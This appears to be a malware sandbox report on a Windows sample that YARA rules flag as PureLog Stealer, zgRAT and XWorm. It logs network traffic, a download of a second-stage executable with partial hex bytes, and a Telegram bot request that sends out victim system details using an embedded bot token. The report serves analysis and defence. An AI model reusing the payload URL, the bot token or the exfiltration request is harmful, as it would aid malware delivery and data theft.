Mar 26, 2024 18:25:02.036349058 CET	39001	49836	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:02.036396027 CET	49836	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.147236109 CET	39001	49837	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:02.147370100 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.171813011 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.416888952 CET	39001	49837	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:02.416961908 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.625977039 CET	39001	49837	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:02.678268909 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.864979029 CET	39001	49837	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:02.865705967 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:02.978113890 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.052293062 CET	39001	49837	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:03.052692890 CET	39001	49837	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:03.052768946 CET	49837	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.166091919 CET	39001	49838	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:03.166260958 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.181463957 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.413265944 CET	39001	49838	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:03.413386106 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.626060963 CET	39001	49838	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:03.678097010 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.865812063 CET	39001	49838	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:03.866473913 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:03.975995064 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.053143024 CET	39001	49838	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:04.053278923 CET	39001	49838	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:04.053343058 CET	49838	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.162791014 CET	39001	49839	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:04.162867069 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.174904108 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.425685883 CET	39001	49839	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:04.425776005 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.637775898 CET	39001	49839	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:04.678157091 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.864609003 CET	39001	49839	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:04.865299940 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:04.975878954 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.051800966 CET	39001	49839	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:05.052038908 CET	39001	49839	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:05.052146912 CET	49839	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.162600040 CET	39001	49840	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:05.162714958 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.175190926 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.410181999 CET	39001	49840	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:05.410265923 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.618247986 CET	39001	49840	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:05.662457943 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.848931074 CET	39001	49840	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:05.849608898 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:05.960155010 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.036191940 CET	39001	49840	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:06.036355019 CET	39001	49840	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:06.036432028 CET	49840	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.147242069 CET	39001	49841	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:06.147617102 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.161813974 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:25:06.192799091 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.321703911 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:25:06.425793886 CET	39001	49841	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:06.425893068 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.630702972 CET	39001	49841	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:06.678129911 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.864828110 CET	39001	49841	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:06.865709066 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:06.975775957 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.052297115 CET	39001	49841	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:07.052550077 CET	39001	49841	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:07.052601099 CET	49841	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.162368059 CET	39001	49842	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:07.162472963 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.173803091 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.410159111 CET	39001	49842	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:07.410212994 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.622981071 CET	39001	49842	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:07.678096056 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.864437103 CET	39001	49842	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:07.865231991 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:07.976020098 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:08.051690102 CET	39001	49842	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:08.051712990 CET	39001	49842	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:08.051820040 CET	49842	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:08.162782907 CET	39001	49843	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:08.163640022 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:08.196508884 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:08.425878048 CET	39001	49843	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:08.427581072 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:08.632973909 CET	39001	49843	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:08.678103924 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:08.864571095 CET	39001	49843	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:08.912482977 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.094501972 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.210499048 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.281136036 CET	39001	49843	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:11.281291008 CET	39001	49843	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:11.281341076 CET	49843	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.397331953 CET	39001	49844	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:11.397443056 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.409394979 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.644607067 CET	39001	49844	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:11.644700050 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:11.851870060 CET	39001	49844	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:11.928162098 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.114617109 CET	39001	49844	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:12.115273952 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.226305008 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.301759005 CET	39001	49844	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:12.302022934 CET	39001	49844	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:12.302118063 CET	49844	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.412868977 CET	39001	49845	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:12.413002968 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.424496889 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.659987926 CET	39001	49845	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:12.660096884 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:12.864744902 CET	39001	49845	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:12.912470102 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:13.098926067 CET	39001	49845	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:13.146845102 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:18.899868965 CET	8081	49797	157.254.223.19	192.168.2.5
Mar 26, 2024 18:25:18.943759918 CET	49797	8081	192.168.2.5	157.254.223.19
Mar 26, 2024 18:25:19.229547977 CET	49845	39001	192.168.2.5	185.196.10.233
Mar 26, 2024 18:25:19.415874958 CET	39001	49845	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:19.416393995 CET	39001	49845	185.196.10.233	192.168.2.5
Mar 26, 2024 18:25:19.416440010 CET	49845	39001	192.168.2.5	185.196.10.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 26, 2024 18:23:12.562452078 CET	65100	53	192.168.2.5	1.1.1.1
Mar 26, 2024 18:23:13.552988052 CET	65100	53	192.168.2.5	1.1.1.1
Mar 26, 2024 18:23:13.732692003 CET	53	65100	1.1.1.1	192.168.2.5
Mar 26, 2024 18:23:13.732722998 CET	53	65100	1.1.1.1	192.168.2.5
Mar 26, 2024 18:24:21.868052006 CET	56124	53	192.168.2.5	1.1.1.1
Mar 26, 2024 18:24:21.963368893 CET	53	56124	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 26, 2024 18:23:12.562452078 CET	192.168.2.5	1.1.1.1	0x4236	Standard query (0)	gjhfhgdg.insane.wang	A (IP address)	IN (0x0001)	false
Mar 26, 2024 18:23:13.552988052 CET	192.168.2.5	1.1.1.1	0x4236	Standard query (0)	gjhfhgdg.insane.wang	A (IP address)	IN (0x0001)	false
Mar 26, 2024 18:24:21.868052006 CET	192.168.2.5	1.1.1.1	0xd7d8	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 26, 2024 18:23:13.732692003 CET	1.1.1.1	192.168.2.5	0x4236	No error (0)	gjhfhgdg.insane.wang	185.196.10.233	A (IP address)	IN (0x0001)	false
Mar 26, 2024 18:23:13.732722998 CET	1.1.1.1	192.168.2.5	0x4236	No error (0)	gjhfhgdg.insane.wang	185.196.10.233	A (IP address)	IN (0x0001)	false
Mar 26, 2024 18:24:21.963368893 CET	1.1.1.1	192.168.2.5	0xd7d8	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

185.196.10.233

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49728	185.196.10.233	80	348	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Mar 26, 2024 18:23:16.066544056 CET	75	OUT	GET /dggfsff.exe HTTP/1.1 Host: 185.196.10.233 Connection: Keep-Alive
Mar 26, 2024 18:23:16.254343987 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 26 Mar 2024 17:23:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 25 Mar 2024 19:48:20 GMT ETag: "25200-6148174a2032a" Accept-Ranges: bytes Content-Length: 152064 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 be 01 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 96 00 00 00 ba 01 00 00 00 00 00 1e b4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 b3 00 00 57 00 00 00 00 c0 00 00 ac b7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 94 00 00 00 20 00 00 00 96 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac b7 01 00 00 c0 00 00 00 b8 01 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 90 58 00 00 34 5b 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 0a 00 00 11 03 12 00 fe 15 02 00 00 1b 06 81 02 00 00 1b 2a 1e 02 28 17 00 00 0a 2a 13 30 01 00 20 00 00 00 0b 00 00 11 7e Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELff @ @W H.text$ `.rsrc@@.relocP@BHX4[((ssss0~o+0~o+0~o+0~o+0((+0(+0(+0(+0-(++++0(0 ~
Mar 26, 2024 18:23:16.254375935 CET	1286	IN	Data Raw: 19 00 00 0a 8c 03 00 00 1b 2d 0a 28 02 00 00 2b 80 19 00 00 0a 7e 19 00 00 0a 0a 2b 00 06 2a 1e 02 28 17 00 00 0a 2a 13 30 02 00 98 00 00 00 00 00 00 00 72 01 00 00 70 80 06 00 00 04 72 33 00 00 70 80 07 00 00 04 72 65 00 00 70 80 08 00 00 04 72 Data Ascii: -(+~+(0rpr3preprprprprpr9p(rCp(rUprpr[prprap((*0~ (
Mar 26, 2024 18:23:16.254420996 CET	1286	IN	Data Raw: 05 19 7e 13 00 00 04 a2 11 05 1a 72 f3 04 00 70 a2 11 05 1b 08 a2 11 05 28 44 00 00 0a 6f 45 00 00 0a 26 de 0a 07 2c 06 07 6f 46 00 00 0a dc de 0f 25 28 24 00 00 0a 13 04 28 26 00 00 0a de 00 2a 41 4c 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 1c Data Ascii: ~rp(DoE&,oF%($(&*AL,0,0(!(:9sGrpoHoIrp~0rp((oJ(KoLrp~0('
Mar 26, 2024 18:23:16.254439116 CET	1286	IN	Data Raw: 28 65 00 00 0a 0a de 1d de 1b 25 28 24 00 00 0a 0c 72 ab 06 00 70 0a 28 26 00 00 0a de 07 28 26 00 00 0a de 00 06 2a 01 10 00 00 00 00 00 00 23 23 00 1b 2c 00 00 01 1b 30 03 00 49 00 00 00 12 00 00 11 7e 30 00 00 04 28 27 00 00 0a 7e 0b 00 00 04 Data Ascii: (e%($rp(&(&##,0I~0('~(f3rkp'+rSp%($rp(&(&,,,0>(gsh oi(b%($rp(&(&*
Mar 26, 2024 18:23:16.254483938 CET	1286	IN	Data Raw: 00 1b 30 02 00 23 00 00 00 18 00 00 11 7e 15 00 00 04 02 6f 86 00 00 0a 26 de 14 25 28 24 00 00 0a 0a 16 80 14 00 00 04 28 26 00 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 0e 0e 00 14 2c 00 00 01 1b 30 02 00 8f 00 00 00 19 00 00 11 7e 1a 00 00 04 Data Ascii: 0#~o&%($(&,0~, ~o%($(&~,~o~oz%($(&~,~o~o%($(&((,.J
Mar 26, 2024 18:23:16.254499912 CET	1286	IN	Data Raw: 16 28 66 00 00 0a 16 33 0f 72 e1 08 00 70 28 25 00 00 06 38 95 02 00 00 11 11 72 eb 08 00 70 16 28 66 00 00 0a 16 33 28 72 eb 08 00 70 7e 1e 00 00 04 28 98 00 00 0a 28 69 00 00 06 28 98 00 00 0a 28 22 00 00 0a 28 25 00 00 06 38 5d 02 00 00 11 11 Data Ascii: (f3rp(%8rp(f3(rp~((i(("(%8]rp(f3J(l-#rp~((("(%+(l(m(.8rp(f3&(g(k&(m(.8r1p(f3Ar1
Mar 26, 2024 18:23:16.254565954 CET	1286	IN	Data Raw: 00 0a 28 25 00 00 06 dd 21 03 00 00 38 d8 02 00 00 07 14 72 7f 09 00 70 16 8d 03 00 00 01 14 14 14 28 32 00 00 0a 72 c9 09 00 70 16 28 b3 00 00 0a 2c 66 7e 1f 00 00 04 18 9a 28 29 00 00 0a 2c 4e 07 14 72 91 09 00 70 18 8d 03 00 00 01 13 07 11 07 Data Ascii: (%!8rp(2rp(,f~(),Nrp~~(g(m(5&8Prp(2rp(,Urp~(s
Mar 26, 2024 18:23:16.254582882 CET	1286	IN	Data Raw: 0a 00 70 16 8d 03 00 00 01 14 14 14 28 32 00 00 0a 28 22 00 00 0a 6f bd 00 00 0a 11 04 17 d6 13 04 11 04 11 05 8e b7 32 cc 1f 1e 0a 38 82 00 00 00 28 be 00 00 0a 13 07 16 13 06 2b 60 11 07 11 06 9a 0d 09 6f bf 00 00 0a 28 c0 00 00 0a 2c 02 2b 45 Data Ascii: p(2("o28(+`o(,+Eoo%s(+,&1!r;poorIp(((/2 (!~:t*0!9(< (= '(>($(
Mar 26, 2024 18:23:16.254641056 CET	1286	IN	Data Raw: 0b 00 70 6f db 00 00 0a 11 05 72 04 0c 00 70 28 dc 00 00 0a 28 1e 00 00 0a 6f db 00 00 0a 11 05 72 0c 0c 00 70 28 dd 00 00 0a 28 27 00 00 0a 72 18 0c 00 70 28 28 00 00 0a 6f db 00 00 0a 11 05 72 04 0c 00 70 28 8f 00 00 0a 28 1e 00 00 0a 6f db 00 Data Ascii: porp((orp(('rp((orp((orp('rp((o,oF,(&($(&sGoHooooI(K&(%%($(&*A
Mar 26, 2024 18:23:16.254673004 CET	1286	IN	Data Raw: 30 07 00 8b 00 00 00 29 00 00 11 16 0b 73 6c 00 00 0a 0d 20 00 01 00 00 8d 47 00 00 01 13 05 11 05 74 09 00 00 1b 28 4b 00 00 06 2d 08 72 bd 03 00 70 0a de 5f 02 16 28 4e 00 00 06 8c 89 00 00 01 13 04 28 48 00 00 06 12 01 28 49 00 00 06 28 4c 00 Data Ascii: 0)sl Gt(K-rp_(N(H(I(L(t(M&os($(&o+ln,0(H(I&(rp(2(("(
Mar 26, 2024 18:23:16.441049099 CET	1286	IN	Data Raw: 00 06 de 0e 25 28 24 00 00 0a 0b 28 26 00 00 0a de 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 0e 2c 00 00 01 1e 02 28 17 00 00 0a 2a 13 30 05 00 80 00 00 00 32 00 00 11 73 06 01 00 0a 0a 73 07 01 00 0a 13 06 72 bd 03 00 70 0d 1f 20 8d 47 00 00 Data Ascii: %($(&,(02ssrp G~([o((ooo(o(\+03(o+04(o+*0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49794	149.154.167.220	443	1784	C:\Users\user\AppData\Local\Temp\btjxg.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-26 17:24:22 UTC	325	OUT	GET /bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-03-26 17:24:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 26 Mar 2024 17:24:22 GMT Content-Type: application/json Content-Length: 399 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-03-26 17:24:23 UTC	399	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 34 39 38 30 36 31 32 38 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6c 6c 20 4c 6f 67 73 20 72 65 73 75 6c 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 69 6b 61 73 68 73 69 6e 67 68 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 32 36 37 36 30 32 30 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 49 44 44 45 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 2d 2d 2d 2d 2d 2d 2d 2d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 68 69 64 64 65 6e 73 65 6c 6c 69 6e 67 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 Data Ascii: {"ok":true,"result":{"message_id":1465,"from":{"id":5498061286,"is_bot":true,"first_name":"All Logs result","username":"Vikashsingh_bot"},"chat":{"id":1267602057,"first_name":"HIDDEN","last_name":"--------","username":"hiddenselling","type":"private"},"da

Target ID:	0
Start time:	18:23:04
Start date:	26/03/2024
Path:	C:\Users\user\Desktop\9NBx4Vmiuj.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\9NBx4Vmiuj.exe"
Imagebase:	0x2341ac40000
File size:	646'656 bytes
MD5 hash:	1D562EAA3E33451A40F60C976C6F4BC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2126079355.000002341C890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:23:07
Start date:	26/03/2024
Path:	C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Imagebase:	0x2183c0d0000
File size:	646'656 bytes
MD5 hash:	1D562EAA3E33451A40F60C976C6F4BC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2158779274.000002184E8F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2158779274.000002184E858000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2158779274.000002184E7E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: 